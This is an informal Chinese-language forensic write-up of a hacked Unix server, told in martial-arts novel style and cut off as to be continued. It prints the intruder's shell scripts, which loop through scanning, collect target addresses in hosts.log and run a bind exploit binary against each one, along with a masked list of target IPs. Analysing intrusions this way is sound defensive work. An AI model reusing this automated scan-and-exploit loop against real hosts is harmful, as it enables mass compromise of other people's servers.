话说我等携了那些怪异官兵的全部资料回到大本营细细审问......首先是那些sh门下的
,他们没有什么保密纪律可言, 一下就都招了
供词如下:
hack.sh: //当然了, 这个家伙的名字就够吸引人的
#!/bin/sh
# hach.sh, by xxxxxx@263.net, xx-xx, xxxx
clear
tail -f hosts.log | while read TARGET
do
./dobind.sh $TARGET
done
############## End of hach.sh
原来只是个帮凶, 从hosts.log读出些东西来交给dobind.sh来处理
再看dobind.sh是何方神圣:
#!/bin/sh
# dobind.sh, by xxxxxx@263.net, xx-xx, xxxx
/bind $1
exit 1
############## End of dobind.sh
有一点迷惑, 这个东东好像是对hosts.log来的什么参数作处理
到底是要干什么呢?.....不管它先, 看看另一个:
scan.sh: //SCAN???? 你要干什么??我好怕怕!!
#!/bin/sh
# scan.sh, by xxxxxx@263.net, xx-xx, xxxx
while true //够狠的, 也不怕你的兵丁累死
do
ADDRESS=`./rundb`
sleep 100
killall bind 1/dev/null 2/dev/null3/dev/null
./scan $ADDRESS
done
############## End of scan.sh
最后一个是star.sh看来是他们的头儿:
#!/bin/sh
# star.sh, by xxxxxx@263.net, xx-xx, xxxx
# Let's go!
rm -rf bindname.log
touch bindname.log
nohup ./scan.sh /dev/null &
nohup ./hack.sh /dev/null &
############## End of star.sh
好吗, 看起来这可不是一个一般的江湖混混,早已取得系统的最高权限, 并在此安排了几
个euid=root的"鼹鼠",八成是一个黑道高手, 至少从他的这几个手下的水平来看是这样,不过
奇怪的事怎么他没有悄悄换掉营中的几个心腹兵丁(ps, ls, etc),让我们很容易的找到了他
的蛛丝马迹,那些躲在器械房(/dev)的可疑官兵也无所遁形,最后还有一些其他相关文件要看
:
比如上面dobind.sh用到的hosts.log:
xxx.49.6.182
xxx.49.8.196
xxx.49.9.204
xxx.49.12.20
xxx.4.143.132
xxx.4.145.100
xxx.4.146.124
xxx.4.149.80
xxx.4.158.110
xxx.4.158.160
xxx.4.160.28
......
(处于安全的考虑, 此处隐去了地址的最高段)
全是江湖上的各个门派的所在(IP地址)....然后, 黑客打发在hack.sh中逐个取出地址打
发手下bind.sh对付他们去了
这个hosts.log从哪里来的呢?从star.sh看来, 只有scan.sh来做这件事了,那么就要看s
can.sh调遣的兵丁rundb和scan了。可是这两个都是ELF 派的,铁齿钢牙, 嘴不好撬啊....(未完待续)